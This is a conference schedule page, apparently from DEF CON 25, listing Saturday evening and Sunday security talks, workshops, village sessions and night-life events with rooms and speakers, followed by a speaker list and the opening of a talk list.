DL - Table 5 - EAPHammer - Gabriel Ryan
DL - Table 6/Five - ShinoBOT Family - Sh1n0g1
HHV - Main Contest Area, Pool Level - Workshop: Component Desoldering and Recovery -
ICS - Calibria - Grid insecurity - and how to really fix this shit - Bryson Bort, Atlas
IOT - Main Contest Area - Redesigning PKI for IoT because Crypto is Hard - Brian Knopf @DoYouQA
PHV - Milano VIII - Promenade Level - Fooling the Hound: Deceiving Domain Admin Hunters - Tom Sela
PHW - Neopolitan BR IV - Promenade Level - (16:30-17:59) - Serious Intro to Python for Admins - David Potts
RCV - Palermo room, Promenade level - Intro to OSINT: Zero on the way to Hero - Joe Gray
SEV - Emperors BR II - The Human Factor: Why Are We So Bad at Security and Risk Assessment? - John Nye
SEV - Emperors BR II - (16:55-17:25) - Are you Killing your security program? - Michele Fincher
SKY - Verona/Tuin/Trevi - Promenade Level - Rockin' the (vox)Vote - algorythm
WV - Florentine BR I & II - Promenade Level - WIGLE Like You Mean It - Aardvark and Darkmatter
WS - Octavius 1 - cont...(14:30-18:30) - Hacking Network Protocols using Kali - Thomas Wilhelm, John Spearing
WS - Octavius 4 - cont...(14:30-18:30) - Principals on Leveraging PowerShell for Red Teams - Carlos Perez
WS - Octavius 5 - cont...(14:30-18:30) - Exploitation/Malware Forward Engineering - Sean Dillon, Zachary Harding
WS - Octavius 6 - cont...(14:30-18:30) - Pwning machine learning systems - Clarence Chio, Anto Joseph
WS - Octavius 7 - cont...(14:30-18:30) - Harnessing the Power of Docker and Kubernetes to Supercharge Your Hacking Tactics - Anshuman Bhartiya, Anthony Bislew

 

Saturday - 17:00


Return to Index  -  Locations Legend
BHV - Pisa Room - The Brave New World of Bio-Entrepreneurship - Jun Axup
BHV - Pisa Room - (17:30-17:59) - The collision of prosthetics, robotics and the human interface - Randall Alley
BillW - Office 4A on Promenade Level - Friends of Bill W -
CHV - Village Talks Outside Contest Area, Pool Level - cont...(16:30-17:30) - The Bicho: An Advanced Car Backdoor Maker - Sheila Ayelen Berta
CPV - Florentine Ballroom 4 - Blue Team TLS Hugs - Lee Brotherston
CPV - Florentine Ballroom 4 - (17:30-18:00) - Automated Testing using Crypto Differential Fuzzing (DO NOT RECORD) - Yolan Romailler
DC - Track 1 - Here to stay: Gaining persistency by abusing advanced authentication mechanisms - Marina Simakov, Igal Gofman
DC - Track 2 - Taking Windows 10 Kernel Exploitation to the next level - Leveraging write-what-where vulnerabilities in Creators Update - Morten Schenk
DC - Track 3 - Introducing HUNT: Data Driven Web Hacking & Manual Testing - Jason Haddix
DC - Track 4 - Popping a Smart Gun - Plore
DL - Table 1 - cont...(16:00-17:50) - Advanced Spectrum Monitoring with ShinySDR - Michael Ossmann, Dominic Spill
DL - Table 2 - cont...(16:00-17:50) - DNS-Exfil-Suite - Nolan Berry, Cory Schwartz
DL - Table 3 - cont...(16:00-17:50) - CellAnalysis - Pedro Cabrera
DL - Table 4 - cont...(16:00-17:50) - Universal Serial aBUSe - Rogan Dawes
DL - Table 5 - cont...(16:00-17:50) - EAPHammer - Gabriel Ryan
DL - Table 6/Five - cont...(16:00-17:50) - ShinoBOT Family - Sh1n0g1
IOT - Main Contest Area - (17:40-18:30) - Manufactures Panel - TBA
PHV - Milano VIII - Promenade Level - Hunting Down the Domain Admin and Rob Your Network - Keith Lee and Michael Gianarakis
PHV - Milano VIII - Promenade Level - (17:40-17:59) - Strengthen Your SecOps Team by Leveraging Neurodiversity - Megan Roddie
PHW - Neopolitan BR IV - Promenade Level - cont...(16:30-17:59) - Serious Intro to Python for Admins - David Potts
RCV - Palermo room, Promenade level - cont...(16:00-17:59) - Intro to OSINT: Zero on the way to Hero - Joe Gray
SEV - Emperors BR II - cont...(16:55-17:25) - Are you Killing your security program? - Michele Fincher
SEV - Emperors BR II - (17:30-18:20) - ….Not lose the common touch - Billy Boatright
SKY - Verona/Tuin/Trevi - Promenade Level - Everything you wanted to know about orchestration but were afraid to ask. - redbeard
WV - Florentine BR I & II - Promenade Level - GODUMP-NG packet sniffing the Gotenna - Woody and Tim Kuester
WS - Octavius 1 - cont...(14:30-18:30) - Hacking Network Protocols using Kali - Thomas Wilhelm, John Spearing
WS - Octavius 4 - cont...(14:30-18:30) - Principals on Leveraging PowerShell for Red Teams - Carlos Perez
WS - Octavius 5 - cont...(14:30-18:30) - Exploitation/Malware Forward Engineering - Sean Dillon, Zachary Harding
WS - Octavius 6 - cont...(14:30-18:30) - Pwning machine learning systems - Clarence Chio, Anto Joseph
WS - Octavius 7 - cont...(14:30-18:30) - Harnessing the Power of Docker and Kubernetes to Supercharge Your Hacking Tactics - Anshuman Bhartiya, Anthony Bislew

 

Saturday - 18:00


Return to Index  -  Locations Legend
BHV - Pisa Room - The Rise of Digital Medicine: At-home digital clinical research - Andrea Coravos
BHV - Pisa Room - (18:30-18:30) - Designer Babies - Christian and Erin
IOT - Main Contest Area - cont...(17:40-18:30) - Manufactures Panel - TBA
Night Life - Counsel Boardroom, Promenade Level - Lawyer Meetup -
PHV - Milano VIII - Promenade Level - Passwords on a Phone - Sam Bowne
PHW - Neopolitan BR IV - Promenade Level - (18:15-19:30) - Advanced Implant Detection with Bro & PacketSled - PacketSled
SEV - Emperors BR II - cont...(17:30-18:20) - ….Not lose the common touch - Billy Boatright
SEV - Emperors BR II - (18:25-19:15) - How to protect your banks & enterprises (Talk given by someone who robs banks & enterprises) - Jayson Street
WV - Florentine BR I & II - Promenade Level - A Pineapple, a Turtle, a Bunny, and a Squirrel walk into a bar. - Darren Kitchen and Seb Kinne
WS - Octavius 1 - cont...(14:30-18:30) - Hacking Network Protocols using Kali - Thomas Wilhelm, John Spearing
WS - Octavius 4 - cont...(14:30-18:30) - Principals on Leveraging PowerShell for Red Teams - Carlos Perez
WS - Octavius 5 - cont...(14:30-18:30) - Exploitation/Malware Forward Engineering - Sean Dillon, Zachary Harding
WS - Octavius 6 - cont...(14:30-18:30) - Pwning machine learning systems - Clarence Chio, Anto Joseph
WS - Octavius 7 - cont...(14:30-18:30) - Harnessing the Power of Docker and Kubernetes to Supercharge Your Hacking Tactics - Anshuman Bhartiya, Anthony Bislew

 

Saturday - 19:00


Return to Index  -  Locations Legend
PHW - Neopolitan BR IV - Promenade Level - cont...(18:15-19:30) - Advanced Implant Detection with Bro & PacketSled - PacketSled
SEV - Emperors BR II - cont...(18:25-19:15) - How to protect your banks & enterprises (Talk given by someone who robs banks & enterprises) - Jayson Street
SEV - Emperors BR II - (19:15-20:05) - Change Agents: How to Effectively Influence Intractable Corporate Cultures - Keith Conway

 

Saturday - 20:00


Return to Index  -  Locations Legend
DC - Capri Room - Panel - Meet the Feds (who care about security research) - Allan Friedman, Amélie E. Koran, Leonard Bailey, Nick Leiserson, Kimber Dowsett
DC - Modena Room - D0 No H4RM: A Healthcare Security Conversation - Christian "quaddi" Dameff MD MS, Jeff "r3plicant" Tully MD, Beau Woods, Joshua Corman , Michael C. McNeil, Jay Radcliffe, Suzan
Night Life - Roman 1, Promenade Level - Hacker Karaoke -
Night Life - Track 2 - Hacker Jeopardy -
Night Life - Track 3 - (20:30-24:00) - DEF CON Movie Night -
Night Life - Track 4 - Whose Slide is it anyway? -
SEV - Emperors BR II - cont...(19:15-20:05) - Change Agents: How to Effectively Influence Intractable Corporate Cultures - Keith Conway
SEV - Emperors BR II - Social Engineering with Web Analytics - Tyler Rosonke

 

Saturday - 21:00


Return to Index  -  Locations Legend
DC - Capri Room - cont...(20:00-21:59) - Panel - Meet the Feds (who care about security research) - Allan Friedman, Amélie E. Koran, Leonard Bailey, Nick Leiserson, Kimber Dowsett
DC - Modena Room - cont...(20:00-21:59) - D0 No H4RM: A Healthcare Security Conversation - Christian "quaddi" Dameff MD MS, Jeff "r3plicant" Tully MD, Beau Woods, Joshua Corman , Michael C. McNeil, Jay Radcliffe, Suzan
Night Life - Octavius 3&4 - Blanketfort Con -
Night Life - Octavius 5-8 - GRIMM's AWESOME Arcade Party -
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - Official Entertainment: MODERNS -
Night Life - Track 2 - cont...(20:00-24:00) - Hacker Jeopardy
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night
Night Life - Track 4 - cont...(20:00-24:00) - Whose Slide is it anyway?
SEV - Emperors BR II - cont...(20:10-20:40) - Social Engineering with Web Analytics - Tyler Rosonke

 

Saturday - 22:00


Return to Index  -  Locations Legend
Night Life - Octavius 1&2 - Human Zoo -
Night Life - Octavius 3&4 - cont...(21:00-26:00) - Blanketfort Con -
Night Life - Octavius 5-8 - cont...(21:00-26:00) - GRIMM's AWESOME Arcade Party -
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - Official Entertainment: JACKALOPE -
Night Life - Track 2 - Drunk Hacker History -
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night
Night Life - Track 4 - cont...(20:00-24:00) - Whose Slide is it anyway?

 

Saturday - 23:00


Return to Index  -  Locations Legend
IOT - Main Contest Area - (23:30-24:20) - IoT updates to help protect consumers - Aaron Alva @aalvatar & Mark Eichorn of the FTC
Night Life - Octavius 1&2 - cont...(22:00-26:00) - Human Zoo -
Night Life - Octavius 3&4 - cont...(21:00-26:00) - Blanketfort Con -
Night Life - Octavius 5-8 - cont...(21:00-26:00) - GRIMM's AWESOME Arcade Party -
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - Official Entertainment: ZEBBLER ENCANTI -
Night Life - Track 1 & Chillout lounges - (23:30-24:00) - Official Entertainment: LEFT/RIGHT -
Night Life - Track 2 - cont...(20:00-24:00) - Drunk Hacker History
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night
Night Life - Track 4 - cont...(20:00-24:00) - Whose Slide is it anyway?

 

Saturday - 24:00


Return to Index  -  Locations Legend
IOT - Main Contest Area - cont...(23:30-24:20) - IoT updates to help protect consumers - Aaron Alva @aalvatar & Mark Eichorn of the FTC
Night Life - Octavius 1&2 - cont...(22:00-26:00) - Human Zoo -
Night Life - Octavius 3&4 - cont...(21:00-26:00) - Blanketfort Con -
Night Life - Octavius 5-8 - cont...(21:00-26:00) - GRIMM's AWESOME Arcade Party -
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - Official Entertainment: KILL THE NOISE -

 

Saturday - 25:00


Return to Index  -  Locations Legend
Night Life - Octavius 1&2 - cont...(22:00-26:00) - Human Zoo -
Night Life - Octavius 3&4 - cont...(21:00-26:00) - Blanketfort Con -
Night Life - Octavius 5-8 - cont...(21:00-26:00) - GRIMM's AWESOME Arcade Party -
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - (25:30-26:00) - Official Entertainment: CTRL/RSM -

 

Sunday


This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.

 

Sunday - 10:00


Return to Index  -  Locations Legend
DC - Track 1 - Unboxing Android: Everything you wanted to know about Android packers - Avi Bashan, Slava Makkaveev
DC - Track 2 - I Know What You Are by the Smell of Your Wifi - Denton Gentry
DC - Track 2 - (10:20-10:40) - PEIMA (Probability Engine to Identify Malicious Activity): Using Power Laws to address Denial of Service Attacks - Redezem
DC - Track 3 - Breaking Bitcoin Hardware Wallets - Josh Datko, Chris Quartier
DC - Track 3 - (10:20-10:40) - BITSInject - Dor Azouri
DC - Track 4 - Untrustworthy Hardware and How to Fix It - 0ctane
DC - Track 4 - (10:20-10:40) - Ghost in the Droid: Possessing Android Applications with ParaSpectre - chaosdata
DL - Table 1 - probespy - stumblebot
DL - Table 2 - Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes - Takahiro Yoshimura (alterakey), Ken-ya Yoshimura (ad3liae)
DL - Table 3 - GoFetch - Tal Maor
DL - Table 4 - Leviathan Framework - Utku Sen, Ozge Barbaros
DL - Table 5 - WIDY 2.0: WIFI 0WNAGE IN UNDER $5 RELOADED - Vivek Ramachandran, Nishant Sharma, Ashish Bhangale
DL - Table 6 - HI-Jack-2Factor - Weston Hecker
IOT - Main Contest Area - Intelligent Misusers: A Case for Adversarial Modelling on IoT Devices - Pishu Mahtani @pishumahtani
RCV - Palermo room, Promenade level - Building Google For Criminal Enterprises - Anthony
RCV - Palermo room, Promenade level - (10:35-11:25) - FERPA: Only Your Grades Are Safe; OSINT In Higher Education - Leah
SKY - Verona/Tuin/Trevi - Promenade Level - HUMSEC (or how I learned to hate my phone) - amarok

 

Sunday - 11:00


Return to Index  -  Locations Legend
BHV - Pisa Room - The Future is Fake Identities - Paul Ashley
BHV - Pisa Room - (11:30-11:59) - Might as well name it Parmigiana, American, Cheddar, and Swiss - Ken Belva
CPV - Florentine Ballroom 3 - WS: Reasoning about Consensus Algorithms - Zaki Manian
CPV - Florentine Ballroom 4 - (11:30-12:00) - Cypherpunks History - Ryan Lackey
DC - Track 1 - Total Recall: Implanting Passwords in Cognitive Memory - Tess Schrodinger
DC - Track 2 - Backdooring the Lottery and Other Security Tales in Gaming over the Past 25 Years - Gus Fritschie, Evan Teitelman
DC - Track 3 - Exploiting Continuous Integration (CI) and Automated Build systems - spaceB0x
DC - Track 4 - 'Ghost Telephonist' Impersonates You Through LTE CSFB - Yuwei Zheng, Lin Huang
DL - Table 1 - cont...(10:00-11:50) - probespy - stumblebot
DL - Table 2 - cont...(10:00-11:50) - Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes - Takahiro Yoshimura (alterakey), Ken-ya Yoshimura (ad3liae)
DL - Table 3 - cont...(10:00-11:50) - GoFetch - Tal Maor
DL - Table 4 - cont...(10:00-11:50) - Leviathan Framework - Utku Sen, Ozge Barbaros
DL - Table 5 - cont...(10:00-11:50) - WIDY 2.0: WIFI 0WNAGE IN UNDER $5 RELOADED - Vivek Ramachandran, Nishant Sharma, Ashish Bhangale
DL - Table 6 - cont...(10:00-11:50) - HI-Jack-2Factor - Weston Hecker
IOT - Main Contest Area - From FAR and NEAR: Exploiting Overflows on Windows 3.x - Jacob Thompson @isesecurity
PHV - Milano VIII - Promenade Level - Demystifying the OPM breach, WTF really happened - Ron Taylor
PHW - Neopolitan BR IV - Promenade Level - An Intro to Hunting with Splunk - Splunk
RCV - Palermo room, Promenade level - cont...(10:35-11:25) - FERPA: Only Your Grades Are Safe; OSINT In Higher Education - Leah
RCV - Palermo room, Promenade level - (11:25-11:55) - Do Tinder Bots Dream of Electric Toys? How Tinder Bots are breaking hearts all over the world, and trashing Tinder’s reputation while they’re at it. - Inbar Raz
SKY - Verona/Tuin/Trevi - Promenade Level - Its Not Just the Elections! - Malware Utkonos

 

Sunday - 12:00


Return to Index  -  Locations Legend
BHV - Pisa Room - How to use the Scientific Method in Security Research - Jay Radcliffe
BillW - Office 4A on Promenade Level - Friends of Bill W -
CPV - Florentine Ballroom 4 - The Key Management Facility of the Root Zone DNSSEC KSK - Punky Duero
CPV - Florentine Ballroom 4 - (12:30-13:30) - The Policy & Business Case for Privacy By Design - Zerina Curevac
DC - Track 1 - The Black Art of Wireless Post Exploitation - Gabriel "solstice" Ryan
DC - Track 2 - Are all BSDs are created equally? A survey of BSD kernel vulnerabilities. - Ilja van Sprundel
DC - Track 3 - The call is coming from inside the house! Are you ready for the next evolution in DDoS attacks? - Steinthor Bjarnason, Jason Jones
DC - Track 4 - Genetic Diseases to Guide Digital Hacks of the Human Genome: How the Cancer Moonshot Program will Enable Almost Anyone to Crash the Operating System that Runs You or to End Civilization... - John Sotos
DL - Table 1 - WiMonitor - an OpenWRT package for remote WiFi sniffing - Vivek Ramachandran, Nishant Sharma, Ashish Bhangale
DL - Table 2 - Gumbler - Willis Vandevanter
DL - Table 3 - PCILeech - Ulf Frisk
DL - Table 4 - WiFi Cactus - darkmatter
DL - Table 6 - Vapor Trail - Galen Alderson, Larry Pesce
DL - Table 6/Five - ShinoBOT Family - Sh1n0g1
PHV - Milano VIII - Promenade Level - Go Beyond Tabletop Scenarios by Building an Incident Response Simulation Platform - Eric Capuano
PHW - Neopolitan BR IV - Promenade Level - cont...(11:00-12:30) - An Intro to Hunting with Splunk - Splunk
SKY - Verona/Tuin/Trevi - Promenade Level - The Automation and Commoditization of Infosec - Joshua Marpet and Scott Lyons

 

Sunday - 13:00


Return to Index  -  Locations Legend
BHV - Pisa Room - How your doctor might be trying to kill you and how personal genomics can save your life - dlaw and razzies
BHV - Pisa Room - (13:30-13:59) - Neuro Ethics - Dr. Stanislav Naydin and Vlad Gostomelsky
CPV - Florentine Ballroom 4 - cont...(12:30-13:30) - The Policy & Business Case for Privacy By Design - Zerina Curevac
CPV - Florentine Ballroom 4 - (13:30-14:00) - The Why and How for Secure Automatic Patch Management - Scott Arciszewski
DC - Track 1 - Game of Chromes: Owning the Web with Zombie Chrome Extensions - Tomer Cohen
DC - Track 2 - Bypassing Android Password Manager Apps Without Root - Stephan Huber, Siegfried Rasthofer
DC - Track 3 - Malicious CDNs: Identifying Zbot Domains en Masse via SSL Certificates and Bipartite Graphs - Thomas Mathew, Dhia Mahjoub
DC - Track 4 - Revoke-Obfuscation: PowerShell Obfuscation Detection (And Evasion) Using Science - Daniel Bohannon (DBO), Lee Holmes
DL - Table 1 - cont...(12:00-13:50) - WiMonitor - an OpenWRT package for remote WiFi sniffing - Vivek Ramachandran, Nishant Sharma, Ashish Bhangale
DL - Table 2 - cont...(12:00-13:50) - Gumbler - Willis Vandevanter
DL - Table 3 - cont...(12:00-13:50) - PCILeech - Ulf Frisk
DL - Table 4 - cont...(12:00-13:50) - WiFi Cactus - darkmatter
DL - Table 6 - cont...(12:00-13:50) - Vapor Trail - Galen Alderson, Larry Pesce
DL - Table 6/Five - cont...(12:00-13:50) - ShinoBOT Family - Sh1n0g1
PHV - Milano VIII - Promenade Level - Stories from a 15 days SMB Honeypot: Mum, Tons of WannaCry and Evils Attacked Our Home! - Tan Kean Siong
PHW - Neopolitan BR IV - Promenade Level - Introduction to 802.11 Packet Dissection - Megumi Takeshita
SKY - Verona/Tuin/Trevi - Promenade Level - Robbing the network and ways to get there - Keith & Jerel "Low rent Nickerson"

 

Sunday - 14:00


Return to Index  -  Locations Legend
BHV - Pisa Room - Biohacking Street Law - Victoria Sutton
CPV - - Closing
DC - Track 1 - Call the plumber - you have a leak in your (named) pipe - Gil Cohen
DC - Track 2 - Weaponizing Machine Learning: Humanity Was Overrated Anyway - Dan "AltF4" Petro, Ben Morris
DC - Track 3 - Man in the NFC - Haoqi Shan , Jian Yuan
DC - Track 4 - Friday the 13th: JSON attacks! - Alvaro Muñoz, Oleksandr Mirosh
PHW - Neopolitan BR IV - Promenade Level - cont...(13:00-14:30) - Introduction to 802.11 Packet Dissection - Megumi Takeshita

 

Sunday - 15:00


Return to Index  -  Locations Legend
DC - Track 1 - DC to DEF CON: Q&A with Congressmen James Langevin and Will Hurd - Representative James Langevin , Representative Will Hurd , Joshua Corman
DC - Track 1 - 25 Years of Program Analysis - Zardus (Yan Shoshitaishvili)

 

Sunday - 17:00


Return to Index  -  Locations Legend
BillW - Office 4A on Promenade Level - Friends of Bill W -

Speaker List


Dan "AltF4" Petro
David Huerta
Eden Shochat
Inbar Raz
"Snide" Owen
[anonymous panel]
@h0tdish
@mickmoran
#BadgeLife Badge Makers
0ctane
0x00string
303
5A1F
Aardvark
Aaron Alva
Aaron Guzman
Abhay Bhargav
Abhijeth Dugginapeddi
Abhijeth
Adam Steed
Aditya Gupta
Ajit Hatti
Ajit Hatti
Alan Orlikoski
Aleph-Naught-
Alex "Jay" Balan
Alex Kahan
Alexander Zakharov
Alexey Ermishkin
algorythm
Alisha Kloc
Allan Friedman
Alvaro Muñoz
Amanda Plimpton
amarok
Amit Elazari
Amit Klein
Anant Shrivastava
Andrea Coravos
Andrea Matwyshyn
Andreas Dewes
Andrew 'r0d3nt' Strutt
Andrew 'r0d3nt' Strutt
Andrew Allen
Andrew Brandt
Andrew Hay
Andrew Tierney
Andy Robbins
Ankur Tyagi
Anshuman Bhartiya
Anthony Bislew
Anthony Singleton
Anthony
Anto Joseph
Antriksh Shah
Arnaud Soullie
Artem Kondratenko
Ashish Bangale
Ashish Bhangale
Ashish Bhangale
Ashish Bhangale
Atlas
Audie
Avi Bashan
Awesome Folks from Various BioHacking Podcasts
Ayoul3
B1TKILL3R
Balint Seeber
Barbara Simons
BASIM ALTINOK
Beau Woods
Ben Morris
Billy Boatright
Blake Johnson
Brad Pierce
Brandon Dixon
Brent White
Brian Knopf
Brute Logic
Bryan Gillispie
Bryan Passifiume
Bryce Kunz @TweekFawkes
Bryson Bort
c00p3r
Caezar
Caleb Madrigal
Candice Hoke
Carlos Perez
Catherine J. Ullman
ceyx
chaosdata
Charles Tritt
Cheng
Cheryl Biswas
Chet Hosmer
Chet Hosmer
Chris Castellano
Chris Eagle
Chris Frenz
Chris Grayson
Chris Hadnagy
Chris Quartier
Chris Roberts
Chris Sistrunk
Chris Thompson
Chris Wysopal
Christian "quaddi" Dameff MD MS
Christian Heinrich
Christian
Christopher Domas
Christopher Williams
Chuck Easttom
CINCVolFLT
CJ_000
Clarence Chio
Cooper Quintin
Corey Theun
Cory Doctorow
Cory Schwartz
Cory
Cosmo Mielke
Craig Young
Dakota Nelson
Dakota Nelson
Damien "virtualabs" Cauquil
Damon Small
Dan Cvrcek
Dan M.
Dan Regalado
Daniel Adinolfi
Daniel Bohannon (DBO)
Daniel Crowley
Dark Tangent
Dark Tangent
darkmatter
Darkmatter
Darren Kitchen
Darren
David "Karit" Robinson
David Bach
David Hulton
David Jefferson
David Latimer
David Potts
David Wong
Davin Potts
DazzleCatDuo
Deirdre Connolly
Dennis Maldonado
Denton Gentry
Deral Heiland
Devin Duffy-Halseth
Dhia Mahjoub
Dimitry Snezhkov
Dinesh Shetty
dlaw
Dmitry Dain
Dominic Spill
Dominic Spill
Dor Azouri
Dr. Stanislav Naydin
Dr. Suzanne Schwartz
Dr. Suzanne Schwartz
Duo Security
Dylan James Smith
Ed You
Eijah
El Kentaro
Elie Bursztein
Eric Capuano
Eric Capuano
Eric Escobar
Erik Kamerling
Erin
Etienne Stalmans
Eva Galperin
Evan Anderson
Evan Johnson
Evan Teitelman
Evgeny Sidorov
Fahey Owens
Felix Brezo
Francis Brown
FuzzyNop
Gabriel "solstice" Ryan
Gabriel Ryan
Gabriel Ryan
Gabriel Ryan
Galen Alderson
Garry Kasparov
General Douglas Lute
George Tankersley
Gerald Steere
Gil Cohen
Gilberto Bertin
Gingerbread
ginsback
Gita Ziabari
Grifter
Guillermo Buendia
Gus Fritschie
H0m3l3ss
Hanno Böck
Haoqi Shan
Harri Hurst
Harri Hurst
Hawaii John
Helen Thackray
HighWiz
Hyrum Anderson
Ian Foster
Igal Gofman
Ilja van Sprundel
Inbar Raz
INFOSEC UNLOCKED
Invisigoth
IOActive
Itzik Kotler
J0N J4RV1S
Jack Mott
Jack64
Jacob Thompson
Jake Williams
Jason Haddix
Jason Haddix
Jason Hernandez
Jason Jones
Jason Staggs
Jason Williams
Jay Beale
Jay Beale
Jay Beale
Jay Radcliffe
Jay Radcliffe
Jayson E. Street
Jayson Street
Jcran
Jeff "r3plicant" Tully MD
Jeff Quesnelle
Jeffrey Tibbetts
Jen
Jerel
Jeremy Heffner
Jerod MacDonald-Evoy
Jerry Gamblin
Jesse Michael
Jian Yuan
Jim Nitterauer
Jiva
Joe FitzPatrick
Joe FitzPatrick
Joe Gray
Joe Rozner
Joe Stirlandand Kevin Jones
Joe Weiss
Joel Wallenstrom
John Bass
John Ives
John Nye
John Poulin
John Sotos
John Spearing
Jon Medina
Joseph Birr-Pixton
Joseph Hall
Joseph Hall
Josh Datko
Josh Pitts
Joshua Corman
Joshua Corman
Joshua Marpet
Joshua Montgomery
Julian Dana
Julian Dana
Jun Axup
Jun Li
Justin Montalbano
K2
Kashmir Hill
Keith Conway
Keith Lee
Keith Lee
Keith
Ken Belva
Ken Munro
Ken Munro
Ken-ya Yoshimura (ad3liae)
Kenneth Geers
Keoni Gandall
Kevin Hulin
Kevin Sacco
Kit Walsh
Konstantinos Karagiannis
Kurt Opsahl
Lalith Rallabhandi
Lane Thames
Larry Pesce
Larry Vandenaweele
Lauren Rucker
Leah Figueroa
Leah Figueroa
Leah
Lee Brotherston
Lee Holmes
Lee Holmes
Leonard Bailey
Leonard Bailey
Lin Huang
Logan Lamb
Louis Auguste
Luke Young
Major Malfunction
Malware Unicorn
Malware Unicorn
Malware Utkonos
Manfred (@_EBFE)
Marc Newlin
Marc Newlin
Marcello Salvati
Marcelo Mansur
Marek Majkowski
Marina Simakov
Mark Eichorn
Mark Mager
Mati Aharoni
Matt 'openfly' Joyce
Matt Blaze
Matt Blaze
Matt Blaze
Matt Cheung
Matt Cheung
Matt Domko
Matt Knight
Matt Suiche
Matt Wixey
Matthew E. Luallen
Matthew E. Luallen
Maurice Carey
Max Bazaliy
Maxime Morin
Maximus64
Megan Roddie
Megumi Takeshita
Megumi Takeshita
Meow Ludo Meow Meow
Michael C. McNeil
Michael E. Taylor
Michael Gianarakis
Michael Hudson
Michael Leibowitz
Michael Ossmann
Michael Ossmann
Michael Ossmann
Michael T. Raggo
Michele Fincher
Mickey Shkatov
Miguel Guirao
Mike Raggo
Mike Raggo
Mikhail Sosonkin
Mikhail Sosonkin
Min (Spark) Zheng
minion
Mitch Johnson
Morten Schenk
Mr. Br!ml3y
Mr. Sean Kanuck
Mr. Sean Kanuck
Munin
Myles
Nadav Erez
Nadav Erez
Nate Cardozo
Nate Temple
Nathan Bates (@Brutes_)
Nathan Seidle
Neel Pandeya
Nick 'r@ndom' Delewski
Nick Cano
Nick Leiserson
Niki7a
Nishant Sharma
Nishant Sharma
Nishant Sharma
Nishant Sharma
Noah Praetz
Nolan Berry
Nolan
Oleksandr Bazhaniuk
Oleksandr Mirosh
Omar Eissa
Orange Tsai
Ozge Barbaros
p3n3troot0r
p3n3troot0r
PacketSled
Patrick DeSantis
Patrick McNeil
Patrick Wardle
Patrick Wardle
Paul Ashley
Pedro Cabrera
Peter Ewane
Peter Hefley
Peyton "Foofus" Engel
Philip Tully
Pishu Mahtani
Plore
Professor Plum
Punky Duero
Rafael Fontes Souza
Randall Alley
razzies
redbeard
Redezem
RenderMan
Rep. James Langevin
Rep. James Langevin
Rep. Will Hurd
Rep. Will Hurd
Rhett Greenhagen
Richard Henderson
Richard Thieme
Rick Ramgattie
Roamer
Robby Mook
Robert Ghilduta
Robert Wood
Robin Farmanfarmaian
Rogan Dawes
Roger Dingledine
Romain Coltel
Ron Taylor
Ruben Boonen
Ryan Baxendale
Ryan Lackey
Ryan Schmoll
S0ups
Salvador Mendoza
Salvador Mendoza
Sam Bowne
Sam Bowne
Sam Erb
Sam Richards
Sandy Clark
Sarah Zatko
Scott Arciszewski
Scott Behrens
Scott Lyons
Sean Dillon
Sean Metcalf
Sean Wilson
Seb Kinne
SensePost
Sergei Frankoff
Sergey Temnikov
Sh1n0g1
Shabid Buttar
Shaggy
Shane McDougal
Shea Nangle
Sheila Ayelen Berta
Siegfried Rasthofer
Simon Roses
skud
Sky
Slava Makkaveev
Sneha Rajguru
spaceB0x
Splunk
Splunk
Srinivas Rao
Steinthor Bjarnason
Stephan Huber
Steve Pordon
stryngs
stumblebot
Suggy
Svea Eckert
Syler Clayton
Takahiro Yoshimura (alterakey)
Tal Maor
Tan Kean Siong
Tarah Wheeler
TBA
TBA
Terrell McSweeny
Terrell McSweeny
Tess Schrodinger
Tess Schrodinger
Thomas Brandstetter
Thomas d'Otreppe
Thomas d'Otreppe
Thomas Mathew
Thomas Wilhelm
Tim Blute
Tim Cannon
Tim Kuester
Tim Roberts
Tom Sela
Tom Van Norman
Tom Van Norman
Tomas Susanka
Tomer Cohen
Tracy Z. Maleeff
Travis Lawrence
Trevor Goodman
Trey Forgety
trixr4skids
Tyler Rosonke
Tyler
Ulf Frisk
Utku Sen
Vasilios Mavroudis
Victoria Sutton
Vivek Ramachandran
Vivek Ramachandran
Vivek Ramachandran
Vivek Ramachandran
Vivek Ramachandran
Vivek Ramachandran
Vlad Gostomelsky
Vlad Gostomelsky
Vlad Gostomelsky
Vladimir Dashchenko
Vulc@n
Waz
wendy
Wesley McGrew
Weston Hecker
Weston Hecker
Weston Hecker
Whitney Merrill
Will Schroeder
William Knowles
Willis Vandevanter
Wiseacre
Woody
Xiangyu Liu
XlogicX
Yaiza Rubio
Yolan Romailler
Yves Le Provost
Zachary Harding
Zaki Manian
Zardus
Zenofex
Zerina Curevac
zero-x
zerosum0x0
Zhang Yunhai

Talk List


DEFCON-Track 4- 'Ghost Telephonist' Impersonates You Through LTE CSFB
DEFCON-Track 1- 25 Years of Program Analysis
DEFCON-Track 2- Are all BSDs are created equally? A survey of BSD kernel vulnerabilities.
PHV-Milano VIII - Promenade Level- Modern Day CovertTCP with a Twist
Night Life-Chillout Lounge, Roman 3, Promenade Level-"DCG" Mixer
DEFCON-Track 4-"Tick, Tick, Tick. Boom! You're Dead." — Tech & the FTC
DEFCON-Track 4-(Un)Fucking Forensics: Active/Passive (i.e. Offensive/Defensive) memory hacking/debugging.
DEFCON-Track 2-$BIGNUM steps forward, $TRUMPNUM steps back: how can we tell if we're winning?
IOT-Main Contest Area-101 hardware hacking workshop
Night Life-Promenade level, in Skytalks room.-303 Party
Workshops-Octavius 1-A B C of Hunting
DEFCON-Track 3-A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!
CPV-Florentine Ballroom 4-A New Political Era: Time to start wearing tin-foil hats following the 2016 elections?
DEFCON-Track 4-A Picture is Worth a Thousand Words, Literally: Deep Neural Networks for Social Stego
